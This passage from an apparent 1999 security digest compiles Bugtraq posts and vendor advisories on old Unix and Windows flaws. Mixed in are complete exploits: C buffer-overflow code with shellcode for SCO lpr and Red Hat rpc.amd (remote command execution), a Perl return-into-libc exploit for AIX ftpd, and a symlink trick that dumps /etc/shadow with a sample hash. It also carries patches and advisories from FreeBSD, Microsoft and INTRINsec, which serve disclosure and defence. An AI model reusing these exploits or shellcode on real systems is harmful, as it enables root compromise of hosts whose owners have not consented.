forbidden and will remain so until the security problems have been corrected. If you are running proftpd, you are encouraged to find out if there are patches which correct these problems before reenabling it on your system. The previous advisory suggested that any FreeBSD ports version of proftpd after August 30 had the security problems corrected. This has proven to not be the case and was the primary reason for reissuing this advisory. While reissuing the advisory, we added beroftpd since it shares a code history with wu-ftpd. The original advisory mistakenly asserted that proftpd also shared a code history with wuftpd, which is not the case. VI. Credits and Pointers The wu-ftpd advisory can be found at ftp://ftp.wu-ftpd.org/pub/wu-ftpd/2.5.0.Security.Update.asc ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN+BmhFUuHi5z0oilAQFlOAQAiU3kAPurRruiFGfG33OsM3ni86HFpKPZ Hb9pINkP9Fu8qdKD/JKYYSxCLRhJLoqojSHXXpVvhJUOQx+1RVaiVCVNvZhV0ypx 0M/+VEg1IpusbxkTRbNFE6cUrMwAiHvbZepYp41slTiA2MwDV7cqX1yvv1InGU1z HSfQSOB/Kfs= =NPAs -----END PGP SIGNATURE----- This is the moderated mailing list freebsd-announce. The list contains announcements of new FreeBSD capabilities, important events and project milestones. See also the FreeBSD Web pages at http://www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-announce" in the body of the message ----- End forwarded message ----- -- Patrick Oonk - PO1-6BONE - patrick@pine.nl - www.pine.nl/~patrick Pine Internet B.V. PGP key ID BE7497F1 Tel: +31-70-3111010 - Fax: +31-70-3111011 - http://www.pine.nl/ -- Pine Security Digest - http://security.pine.nl/ (Dutch) ---- Excuse of the day: The computer fletely, mouse and all. *** END PGP VERIFIED MESSAGE *** @HWA 39.0 Two SuSE 6.2 local root exploits ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Two SuSE 6.2 local root exploits To: BUGTRAQ@SECURITYFOCUS.COM Greetings, /usr/bin/pb and /usr/bin/pg, suid root by default on SuSE 6.2, allow any user to read any file on the system as shown: susebox:/root # ls -la /usr/bin/pb uname -rwsr-xr-x 1 root root 23544 Jul 22 20:07 /usr/bin/pb susebox:/root # strace /usr/bin/pb ... personality(PER_LINUX) = 0 getpid() = 16623 brk(0) = 0x805032c brk(0x80504cc) = 0x80504cc brk(0x8051000) = 0x8051000 open("pb.conf", O_RDONLY) <-- trouble? = -1 ENOENT (No such file or directory) write(2, "pb.conf fopen: No such file or d"..., 41pb.conf fopen: No such file or directory ) = 41 _exit(1) = ? susebox:/root # --- xnec@susebox:/tmp > id uid=1001(xnec) gid=100(users) groups=100(users) xnec@susebox:/tmp > ln -s /etc/shadow ./pb.conf xnec@susebox:/tmp > pb Unknown config line : <root:nfpzNvX19GwRg:10850:0:10000::::> = <bin:*:8902:0:10000::::> Unknown config line : <daemon:*:8902:0:10000::::> = <lp:*:9473:0:10000::::> Unknown config line : <news:*:8902:0:10000::::> = <uucp:*:0:0:10000::::> Unknown config line : <games:*:0:0:10000::::> = <man:*:8902:0:10000::::> ... etc for the entire shadow file The same scenario for /usr/bin/pg's pg.conf in your cwd. These two programs also contain numerous buffer overflows and other insecure file i/o and should obviously lose their suid bits. They cannot operate correctly without their s-bits unless they are run by root, but no one besides root will run them anyway. These programs are not worth patching. Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com @HWA 40.0 Microsoft Security Bulletin (MS99-034) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Microsoft Security Bulletin (MS99-034) To: BUGTRAQ@SECURITYFOCUS.COM The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. ******************************** Microsoft Security Bulletin (MS99-034) -------------------------------------- Patch Available for "Fragmented IGMP Packet" Vulnerability Originally Posted: September 03, 1999 Summary ======= Microsoft has released a patch that eliminates a vulnerability in the TCP/IP stack implementations of Microsoft(r) Windows(r) 95, Windows 98 and Windows NT(r) 4.0. Fragmented IGMP packets can cause a variety of problems in Windows 95 and 98, up to and including causing the machine to crash. Windows NT 4.0 contains the same vulnerability, but other system mechanisms make a successful attack much more difficult. Frequently asked questions regarding this vulnerability can be found at http://www.microsoft.com/security/bulletins/MS99-034faq.asp Issue ===== By sending fragmented IGMP packets to a Windows 95, 98 or Windows NT 4.0 machine, it is possible to disrupt the normal operation of the machine. This vulnerability primarily affects Windows 95 and 98 machines. Depending on a variety of factors, sending such packets to a Windows 95 or 98 machine may elicit behavior ranging from slow performance to crashing. Windows NT contains the same vulnerability, but other system mechanisms compensate and make it much more difficult to mount a successful attack. Affected Software Versions ========================== - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98 Second Edition - Microsoft Windows NT Workstation 4.0 - Microsoft Windows NT Server 4.0 - Microsoft Windows NT Server 4.0, Enterprise Edition - Microsoft Windows NT Server 4.0, Terminal Server Edition Patch Availability ================== - Windows 95: This patch will be available shortly - Windows 98: http://www.microsoft.com/windows98/downloads/corporate.asp - Windows NT Workstation 4.0; Windows NT Server 4.0; Windows NT Server, Enterprise Edition: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa /NT40/hotfixes-postSP5/IGMP-fix/ - Windows NT Server 4.0, Terminal Server Edition: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa /NT40TSE/hotfixes-postSP5/IGMP-fix/ NOTE: Line breaks have been inserted into the above URLs for readability. NOTE: The Windows 95 and 98 patches also will be available via WindowsUpdate (http://www.microsoft.com/windowsupdate) circa September 9, 1999. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-034: Frequently Asked Questions, http://www.microsoft.com/security/bulletins/MS99-034faq.asp. - Microsoft Knowledge Base (KB) article Q238329, Fragmented IGMP Packets may Promote Denial of Service, http://support.microsoft.com/support/kb/articles/q238/3/29.asp. (Note: It may take 24 hours from the original posting of this bulletin for the KB article to be visible.) - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting Microsoft Technical Support is available at http://support.microsoft.com/support/contact/default.asp. Revisions ========= - September 03, 1999: Bulletin Created. ---------------------------------------------------------------------- THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. (c) 1999 Microsoft Corporation. All rights reserved. Terms of Use. ******************************************************************* You have received this e-mail bulletin as a result of your registration to the Microsoft Product Security Notification Service. You may unsubscribe from this e-mail notification service at any time by sending an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM The subject line and message body are not used in processing the request, and can be anything you like. For more information on the Microsoft Security Notification Service please visit http://www.microsoft.com/security/services/bulletin.asp. For security-related information about Microsoft products, please visit the Microsoft Security Advisor web site at http://www.microsoft.com/security. @HWA 41.0 SCO 5.0.5 lpr local root exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: SCO 5.0.5 lpr local root exploit To: BUGTRAQ@SECURITYFOCUS.COM Greetings, There is a hole in SCO 5.0.5, probably 5.0.x, /usr/bin/lpr. Or more accurately, /usr/lpd/remote/lp, which lpr execs and passes your command line args on to. This means that while /usr/bin/lpr is sgid lp, we'll still get a rootshell because /usr/lpd/remote/lp is suid root/sgid daemon. I haven't looked into the remote angle of this exploit, though the pathname is hardly encouraging. FIX: I would recommend a recursive directory sbit-search-and-destroy if you're running SCO.. -Brock --- cut --- /* * sco_lpr.c - overflows /usr/remote/lpd/lp and gives rootshell * Tested on SCO 5.0.5+Skunkware98 * * Compile gcc -o sco_lpr sco_lpr.c * sco_lpr <offset> <bufsiz> * * -Brock Tellier btellier@webley.com */ #include <stdlib.h> #include <stdio.h> char scoshell[]= /* doble@iname.com */ "\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0" "\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff" "\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa"; #define LEN 3000 #define NOP 0x90 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { long int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else if (argc == 3) { buflen=atoi(argv[2]); } else { offset=1800; buflen=1500; } addr=get_sp(); fprintf(stderr, "SCO 5.0.5 lpr exploit\n"); fprintf(stderr, "Brock Tellier btellier@webley.com\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),scoshell,strlen(scoshell)); for(i=((buflen/2) + strlen(scoshell))+1;i<buflen-4;i+=4) *(int *)&buf[i]=addr+offset; execl("/usr/bin/lpr", "lpr", "-o", buf, NULL); exit(0); } --- cut --- Brock Tellier UNIX Systems Administrator Webley Systems www.webley.com @HWA 42.0 Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an RS6000 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl # *** Synnergy Networks # * Description: # # Remote bufferoverflow exploit for ftpd from AIX 4.3.2 running on an # RS6000. (power) # This is an return into libc exploit specificly crafted for # one box and it is very unlikely to work on another box # * Author: # # dvorak (dvorak@synnergy.net) # Synnergy Networks (c) 1999, http://www.synnergy.net # * Greets: # # Synnergy Networks, Hit2000 crew, Emphyrio, shevek # * Comments: # # A full working exploit will be released later on. # The addresses point to positions in the program or libraries, # only the relevant instructions are shown also note that b r0 # is in fact something like mfsbr r0, bsbr or what that is in # RS6000 assembly. # # The final call is to system which needs the following arguments: # r3 = address of command to execute # r2 = TOC (what is TOC anyway), I don't know if it does matter but # we set it anyway (we can so why not do it) # r1 = SP but this is ok already, # the rest is free so it seems. # # Our route: # 0x10010150: sets r2 to a place in the buffer and jumps to 0x10015228 # 0x10015228: loads r12 with a value from our buffera # loads r0 with the next address to jump to (0x1001038c) # and sets r2 to another place in our buffer # 0x1001038c: sets r3 to a place in the buffer (finally!) # sets r0 to next address to jump to (0xd00406d4, system(...)) # # The flow with registers is thus: # r2 = 0x14(r1) # r12 = 0x110(r2) # r0 = 0x0(r12) # r2 = 0x4(r12) # r3 = 0x40(r1) # r12 = 0x3c(r2) # 0x14(r1) = r12 this is the plave where TOC is stored but it doesn't seem # to matter # r0 = 0x0(12) # r2 = 0x04(r12) # and of we go... # # We set: # $buf = the buffer on the stack $buf[0] is the first byte in the buffer # but we will count offsets from 4 (the first 4 bytes is just "CEL " is # doesn't matter, only the space does (it makes sure the rest of the buffer) # stays the way it is and isn't converted into lower case # # Offsets: # 0x000: 0x1001038c # 0x004: buf[0] # 0x008: this is the place where the address of the systemcall is taken from # 0xd00406d4 in our case# 0x00c: thi is the address where r2 is loaded # from just before the call to # system(..) we set it to the TOC in our program we don't know if it # matters and if the TOC is constant between hosts # 0x03c: buf[08] # 0x110: buf[0] # 0x204: return address (0x10010150) # 0x210: buf[0] # 0x23c: buf[0x240] # 0x240: "/tmp/sh" or whatever command you want to execute # r1 points to buf[0x1fc] # # I assume the positions in the libraries/program are fixed and that TOC # either doesn't matter or is fixed to please enlighten me on these topics. # # 0x10010150: # l r2, 0x14(r1) # b 0x10015228 # 0x10015228: # l r12, 0x110(r2) # st r12, 0x14(r1) # l r0, 0x0(r12) # l r2, 0x4(r12) # b r0 # 0x1001038c: # l r3, 0x40(r1) # b 0x100136f8 # 0x100136f8: # l r12, 0x3c(r2) # st r12, 0x14(r1) # l r0, 0x0(r12) # l r2, 0x04(r12) # *** Synnergy Networks $bufstart = 0x2ff22724; # this is our first guess $nop = "\xde\xad\xca\xfe"; $buf = "CEL "; $buf .= "\x10\x01\x03\x8c"; # 0 address of second piece of # 'borrowed' code $buf .= pack ("N", $bufstart); # 4 $buf .= "\xd0\x04\x06\xd4"; # 8 system call.. $buf .= "\xf0\x14\x63\x5c"; # c TOC $offset = 0x10; while ($offset < 0x3c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x008); $offset += 4; while ($offset < 0x110) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x204) { $offset += 4; $buf .= $nop; } $buf .= "\x10\x01\x01\x50"; $offset += 4; while ($offset < 0x210) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart); $offset += 4; while ($offset < 0x23c) { $offset += 4; $buf .= $nop; } $buf .= pack ("N", $bufstart + 0x240); $offset += 4; while ($offset < 0x240) { $offset += 4; $buf .= $nop; } # this is the command that will be run through system $buf .= "/tmp/sh"; $buf .= "\n"; # offcourse you should change this . # open F, "| nc -v -v -n 192.168.2.12 21"; open F, "| od -tx1"; printf F $buf; close F; # EOF @HWA 43.0 SDI AMD remote exploit for RH linux ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: SDI AMD remote exploit for RH linux To: BUGTRAQ@SECURITYFOCUS.COM Here is the exploit for the AMD vulnerability. You may choose to send the information via UDP or TCP, or even to bypasse the portmap by specifing the automount port. ------------------------------------ /* * SDI rpc.AMD automountd remote exploit for RedHat Linux * Sekure SDI - Brazilian Information Security Team * by c0nd0r <condor@sekure.org> - Jul/99 * * AMD doesn't check bounds in the plog() function, so we may * call the procedure 7 and exploit this vulnerability. * It has been tested under rh5.2/5.0 but this vulnerability exists in * all versions. * * Greets: jamez, bishop, bahamas, stderr, dumped, paranoia, marty(nordo), * vader, fcon, slide, corb, soft distortion and specially to * my sasazita! Also lots of thanks to toxyn.org(frawd,r00t), * pulhas.org, phibernet, superbofh(seti) and el8.org (duke). * #uground (brasnet), #sdi(efnet), #(phibernet). * * usage: SDIamd -h <host> -c <command> [-p <port>] [-o <offset>] * where -p <port> will bypass the portmap. * * Warning: We take no responsability for the consequences on using this * tool. DO NOT USE FOR ILICIT ACTIVITIES! * * Agradecimentos a todo o pessoal que vem acompanhando a lista brasileira * de seguranca - BOS-BR <bos-br-request@sekure.org>. Fiquem ligado na * nova pagina do grupo! */ #include <stdio.h> #include <unistd.h> #include <string.h> #include <netdb.h> #include <rpc/rpc.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #define AMQ_PROGRAM ((u_long)300019) #define AMQ_VERSION ((u_long)1) #define AMQPROC_MOUNT ((u_long)7) #define AMQ_STRLEN 1024 #define XDRPROC_T_TYPE xdrproc_t #define voidp void * #define NOP 0x90 char shellcode[] = "\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0" "\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88" "\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3" "\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8" "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c "; //typedef bool_t (*xdrproc_t) __P ((XDR *, __ptr_t, ...)); typedef char *amq_string; typedef long *time_type; typedef struct amq_mount_tree amq_mount_tree; typedef amq_mount_tree *amq_mount_tree_p; struct amq_mount_tree { amq_string mt_mountinfo; amq_string mt_directory; amq_string mt_mountpoint; amq_string mt_type; time_type mt_mounttime; u_short mt_mountuid; int mt_getattr; int mt_lookup; int mt_readdir; int mt_readlink; int mt_statfs; struct amq_mount_tree *mt_next; struct amq_mount_tree *mt_child; }; bool_t xdr_amq_string(XDR *xdrs, amq_string *objp) { if (!xdr_string(xdrs, objp, AMQ_STRLEN)) { return (FALSE); } return (TRUE); } bool_t xdr_time_type(XDR *xdrs, time_type *objp) { if (!xdr_long(xdrs, (long *) objp)) { return (FALSE); } return (TRUE); } bool_t xdr_amq_mount_tree(XDR *xdrs, amq_mount_tree *objp) { if (!xdr_amq_string(xdrs, &objp->mt_mountinfo)) { return (FALSE); } if (!xdr_amq_string(xdrs, &objp->mt_directory)) { return (FALSE); } if (!xdr_amq_string(xdrs, &objp->mt_mountpoint)) { return (FALSE); } if (!xdr_amq_string(xdrs, &objp->mt_type)) { return (FALSE); } if (!xdr_time_type(xdrs, &objp->mt_mounttime)) { return (FALSE); } if (!xdr_u_short(xdrs, &objp->mt_mountuid)) { return (FALSE); } if (!xdr_int(xdrs, &objp->mt_getattr)) { return (FALSE); } if (!xdr_int(xdrs, &objp->mt_lookup)) { return (FALSE); } if (!xdr_int(xdrs, &objp->mt_readdir)) { return (FALSE); } if (!xdr_int(xdrs, &objp->mt_readlink)) { return (FALSE); } if (!xdr_int(xdrs, &objp->mt_statfs)) { return (FALSE); } if (!xdr_pointer(xdrs, (char **) &objp->mt_next, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) { return (FALSE); } if (!xdr_pointer(xdrs, (char **) &objp->mt_child, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) { return (FALSE); } return (TRUE); } bool_t xdr_amq_mount_tree_p(XDR *xdrs, amq_mount_tree_p *objp) { if (!xdr_pointer(xdrs, (char **) objp, sizeof(amq_mount_tree), (XDRPROC_T_TYPE) xdr_amq_mount_tree)) { return (FALSE); } return (TRUE); } int usage ( char *arg) { printf ( "Sekure SDI - AMD remote exploit for linux\n"); printf ( "usage: %s -h <host> -c <command> [-o <offset>] [-p <port>] [-u] \n", arg); printf ( " where: [port] will bypass portmap\n"); printf ( " [-u ] will use udp instead of tcp\n"); exit (0); } int *amqproc_mount_1(voidp argp, CLIENT *clnt); int main ( int argc, char *argv[] ) { CLIENT *cl; struct timeval tv; struct sockaddr_in sa; struct hostent *he; char buf[8000], *path = buf, comm[200], *host, *cc; int sd, res, x, y, offset=0, c, port=0, damn=0, udp=0; long addr = 0xbffff505; while ((c = getopt(argc, argv, "h:p:c:o:u")) != -1) switch (c) { case 'h': host = optarg; break; case 'p': port = atoi(optarg); break; case 'c': cc = optarg; break; case 'o': offset = atoi ( optarg); break; case 'u': udp = 1; break; default: damn = 1; break; } if (!host || !cc || damn) usage ( argv[0]); sa.sin_family = AF_INET; he = gethostbyname ( host); if (!he) { if ( (sa.sin_addr.s_addr = inet_addr ( host)) == INADDR_NONE) { printf ( "unknown host, try again pal!\n"); exit ( 0); } } else bcopy ( he->h_addr, (struct in_addr *) &sa.sin_addr, he->h_length); sa.sin_port = htons(port); sd = RPC_ANYSOCK; tv.tv_sec = 10; tv.tv_usec = 0; snprintf ( comm, sizeof(comm), "%s", cc); if ( strlen(comm) >= 160) { printf ( "command too long\n"); exit (0); } else { comm[strlen(comm)] = ';'; for ( x = strlen(comm); x < 160; x++) comm[x] = 'A'; } addr += offset; for ( x = 0; x < (1001-(strlen(shellcode)+strlen(comm))); x++) buf[x] = NOP; for ( y = 0; y < strlen(shellcode); x++, y++) buf[x] = shellcode[y]; for ( y = 0; y < strlen(comm); x++, y++) buf[x] = comm[y]; printf ( "SDI automountd remote exploit for linux\n"); printf ( "Host %s \nRET 0x%x \nOFFset %d \n", host, addr, offset); for ( ; x < 1020; x+=4) { buf[x ] = (addr & 0x000000ff); buf[x+1] = (addr & 0x0000ff00) >> 8; buf[x+2] = (addr & 0x00ff0000) >> 16; buf[x+3] = (addr & 0xff000000) >> 24; } buf[strlen(buf)] = '\0'; if (!udp) { if ((cl = clnttcp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, &sd, 0, 0)) == NULL) { clnt_pcreateerror("clnt_create"); exit (-1); } } else { if ((cl = clntudp_create(&sa, AMQ_PROGRAM, AMQ_VERSION, tv, &sd)) == NULL) { clnt_pcreateerror("clnt_create"); exit (-1); } } printf ( "PORT %d \n", ntohs(sa.sin_port)); printf ( "Command: %s \n", cc); amqproc_mount_1 (&path, cl); clnt_destroy ( cl); } int * amqproc_mount_1(voidp argp, CLIENT *clnt) { static int res; struct timeval TIMEOUT = {10, 0}; memset((char *) &res, 0, sizeof(res)); if (clnt_call(clnt, AMQPROC_MOUNT, (XDRPROC_T_TYPE) xdr_amq_string, argp, (XDRPROC_T_TYPE) xdr_int, (caddr_t) & res, TIMEOUT) != RPC_SUCCESS) { printf ( "voce e' um hax0r!\n"); printf ( "don't forget to restart amd: /etc/rc.d/init.d/amd start\n"); clnt_perror ( clnt, "clnt_call"); return (NULL); } printf ( "exploit failed\n"); return (&res); } --------------------------------------- -condor www.sekure.org s e k u r e pgp key available at condor.sekure.org/condor.asc @HWA 44.0 Spoofed Id in Bluestone Sapphire/Web ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: [Security] Spoofed Id in Bluestone Sapphire/Web To: BUGTRAQ@SECURITYFOCUS.COM INTRINsec Security Advisory Release Date : September 02, 1999 Software : Bluestone Sapphire/Web V5 Operating System: Solaris Impact : The attacker can access the session of other connected clients. Author : Gerald.Grevrend@INTRINsec.com Status : Bluestone is advised from this. URLs : http://www.INTRINsec.com __ Diggest __ Sapphire/Web is a framework for iCommerce platforms. This product has a security flaw in its authentication scheme that allows an attacker to easily usurpate the identity of the currently connected clients. Bluestone is advised from this and wont correct this bug. __ Technical Details and Exploits __ To authenticate its clients, Sapphire/Web uses an id stored in a session cookie as authentication scheme. After you have sent your login/password, Sapphire/Web sends you back a session cookie containing your id for this session. There are two flaws in their id authentication scheme : - the id is higly predictable : it is a counter incremented one by one, so given your id, it is easy to guess the id of people connected just before you. - the id longs all your session : it isn't renewed at each http request, so you are sure that if the session hasn't been disconnected, its id is valid. All the attacker has to do is to connect to Sapphire/Web server with a valid login/password and note its id. Then he can make a request with a decreased id in its cookie. With some luck, he will access the session of another client. __ Solutions __ Bluestone doesn't provide a patch for this problem. You have to upgrade your software to the new version (V6.X) that allows you to use your own authentication scheme. __ Contacts __ -- Bluestone Software -- Support Services 1000 Briggs Road Mount Laurel, New Jersey 08054-4101 Phone: 856.778.7900 Fax: 856.234.2877 support@bluestone.com http://www.bluestone.com -- INTRINsec -- INTRINsec is a French Security Specialist. http://www.INTRINsec.com This advisory is available in french. Cet avis est disponible en francais sur notre site. __ DISCLAMERS __ INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDED THESES INFORMATIONS "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. -- Gerald Grevrend : Securite Informatique http://www.INTRINsec.com @HWA 45.0 FreeBSD-SA-99:01: BSD File Flags and Programming Techniques ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: [security-officer@FreeBSD.ORG: FreeBSD-SA-99:01: BSD File Flags and Programming Techniques] To: BUGTRAQ@SECURITYFOCUS.COM [security-officer@FreeBSD.ORG 1.ems Content-Type: text/plain; charset=us-ascii *** PGP Signature Status: unknown *** Signer: Unknown, Key ID xBE7497F1 *** Signed: 9/3/99 11:38:10 PM *** Verified: 9/13/99 2:37:02 PM *** BEGIN PGP VERIFIED MESSAGE *** ----- Forwarded message from security-officer@FreeBSD.ORG ----- Delivered-To: freebsd-announce@freebsd.org From: security-officer@FreeBSD.ORG To: freebsd-announce@FreeBSD.ORG Cc: security-notifications@FreeBSD.ORG Subject: FreeBSD-SA-99:01: BSD File Flags and Programming Techniques Date: Fri, 03 Sep 1999 23:29:36 -0600 X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-99:01 Security Advisory FreeBSD, Inc. Topic: BSD File Flags and Programming Techniques Category: core Module: kernel Announced: 1999-09-04 Affects: FreeBSD 3.2 (and earlier) FreeBSD-current before the correction date. Corrected: FreeBSD-3.3 RELEASE FreeBSD-current as of 1999/08/02 FreeBSD-3.2-stable as of 1999/08/02 FreeBSD-2.2.8-stable as of 1999/08/04 FreeBSD only: NO Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-99:01/ I. Background BSD 4.4 added various flags to files in the file system. These flags control various aspects of which operations are permitted on those files. Historically, root has been been able to do all of these operations so many programs that knew they were running as root didn't check to make sure that these operations succeeded. II. Problem Description A user can set flags and mode on the device which they logged into. Since a bug in login and other similar programs causes the normal chown to fail, this first user will own the terminal of any login. III. Impact Local users can execute a man-in-the-middle attack against any other user (including root) when the other users logs in. This give them the ability to snoop and alter all text that the user writes. Results of this include the ability to execute commands as the user, and stealing the user's password (and anything else the users writes over the connection, including passwords for other machines). IV. Workaround None. V. Solution FreeBSD-current Index: kern/vfs_syscalls.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/sys/kern/vfs_syscalls.c,v retrieving revision 1.125 retrieving revision 1.128 diff -u -r1.125 -r1.128 --- vfs_syscalls.c 1999/07/29 17:02:56 1.125 +++ vfs_syscalls.c 1999/08/04 04:52:18 1.128 @@ -1892,13 +1892,23 @@ int error; struct vattr vattr; + /* + * Prevent non-root users from setting flags on devices. When + * a device is reused, users can retain ownership of the device + * if they are allowed to set flags and programs assume that + * chown can't fail when done as root. + */ + if ((vp->v_type == VCHR || vp->v_type == VBLK) && + ((error = suser_xxx(p->p_ucred, p, PRISON_ROOT)) != 0)) + return (error); + VOP_LEASE(vp, p, p->p_ucred, LEASE_WRITE); vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, p); VATTR_NULL(&vattr); vattr.va_flags = flags; error = VOP_SETATTR(vp, &vattr, p->p_ucred, p); VOP_UNLOCK(vp, 0, p); - return error; + return (error); } /* FreeBSD-3.2-stable Index: kern/vfs_syscalls.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/sys/kern/vfs_syscalls.c,v retrieving revision 1.112.2.3 retrieving revision 1.112.2.5 diff -u -r1.112.2.3 -r1.112.2.5 --- vfs_syscalls.c 1999/07/30 01:07:23 1.112.2.3 +++ vfs_syscalls.c 1999/08/11 21:39:50 1.112.2.5 @@ -1839,13 +1839,23 @@ int error; struct vattr vattr; + /* + * Prevent non-root users from setting flags on devices. When + * a device is reused, users can retain ownership of the device + * if they are allowed to set flags and programs assume that + * chown can't fail when done as root. + */ + if ((vp->v_type == VCHR || vp->v_type == VBLK) && + ((error = suser(p->p_ucred, &p->p_acflag)) != 0)) + return (error); + VOP_LEASE(vp, p, p->p_ucred, LEASE_WRITE); vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, p); VATTR_NULL(&vattr); vattr.va_flags = flags; error = VOP_SETATTR(vp, &vattr, p->p_ucred, p); VOP_UNLOCK(vp, 0, p); - return error; + return (error); } /* FreeBSD 2.2.8-stable: Index: kern/vfs_syscalls.c =================================================================== RCS file: /home/imp/FreeBSD/CVS/src/sys/kern/vfs_syscalls.c,v retrieving revision 1.51.2.7 retrieving revision 1.51.2.8 diff -u -r1.51.2.7 -r1.51.2.8 --- vfs_syscalls.c 1998/07/03 03:50:31 1.51.2.7 +++ vfs_syscalls.c 1999/08/04 18:58:56 1.51.2.8 @@ -1439,6 +1439,17 @@ if (error) return (error); vp = nd.ni_vp; + if ((error = VOP_GETATTR(vp, &vattr, p->p_ucred, p))) + return (error); + /* + * Prevent non-root users from setting flags on devices. When + * a device is reused, users can retain ownership of the device + * if they are allowed to set flags and programs assume that + * chown can't fail when done as root. + */ + if ((vp->v_type == VCHR || vp->v_type == VBLK) && + ((error = suser(p->p_ucred, &p->p_acflag)) != 0)) + return (error); LEASE_CHECK(vp, p, p->p_ucred, LEASE_WRITE); VOP_LOCK(vp); VATTR_NULL(&vattr); VI. Credits Theo de Raadt came up with the firewalling solution presented here. lumpy@blue.9mm.com brought this problem to light. ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQCVAwUBN9CAHFUuHi5z0oilAQEJPwP/XhzCOs4ipJkZIPWlSDvsvPLcJWXzb3HK 